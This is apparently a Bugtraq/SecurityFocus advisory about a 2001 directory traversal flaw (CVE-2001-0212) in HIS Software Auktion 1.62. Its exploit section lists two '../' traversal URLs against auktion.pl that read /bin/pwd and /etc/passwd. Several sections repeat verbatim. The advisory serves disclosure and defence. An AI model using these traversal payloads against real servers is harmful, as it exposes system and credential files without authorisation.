HIS Software Auktion 1.62 Directory Traversal Vulnerability
BID:2367
Info
HIS Software Auktion 1.62 Directory Traversal Vulnerability
| Bugtraq ID: | 2367 |
| Class: | Input Validation Error |
| CVE: |
CVE-2001-0212 |
| Remote: | Yes |
| Local: | Yes |
| Published: | Feb 12 2001 12:00AM |
| Updated: | Jul 11 2009 04:46AM |
| Credit: | Discovered and posted to Bugtraq by <[email protected]> on Feb 12, 2001. |
| Vulnerable: |
HIS Software Auktion 1.62 |
| Not Vulnerable: | |
Discussion
HIS Software Auktion 1.62 Directory Traversal Vulnerability
A remote user could gain read access to known files outside of the root directory where HIS Software Auktion 1.62 resides. Requesting a specially crafted URL composed of '../' sequences along with the known filename will disclose the requested file. This vulnerability could also lead to the execution of arbitrary code.
A remote user could gain read access to known files outside of the root directory where HIS Software Auktion 1.62 resides. Requesting a specially crafted URL composed of '../' sequences along with the known filename will disclose the requested file. This vulnerability could also lead to the execution of arbitrary code.
Exploit / POC
HIS Software Auktion 1.62 Directory Traversal Vulnerability
The following example has been provided by <[email protected]>:
http://target/cgi-bin/auktion.pl menue=../../../../../../../../../../../../../bin/pwd
http://target/cgi-bin/auktion.pl menue=../../../../../../../../../../../../../etc/passwd
The following example has been provided by <[email protected]>:
http://target/cgi-bin/auktion.pl menue=../../../../../../../../../../../../../bin/pwd
http://target/cgi-bin/auktion.pl menue=../../../../../../../../../../../../../etc/passwd
Solution / Fix
HIS Software Auktion 1.62 Directory Traversal Vulnerability
Solution:
Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
HIS Software Auktion 1.62 Directory Traversal Vulnerability
References:
References:
- HIS Software Homepage (HIS Software)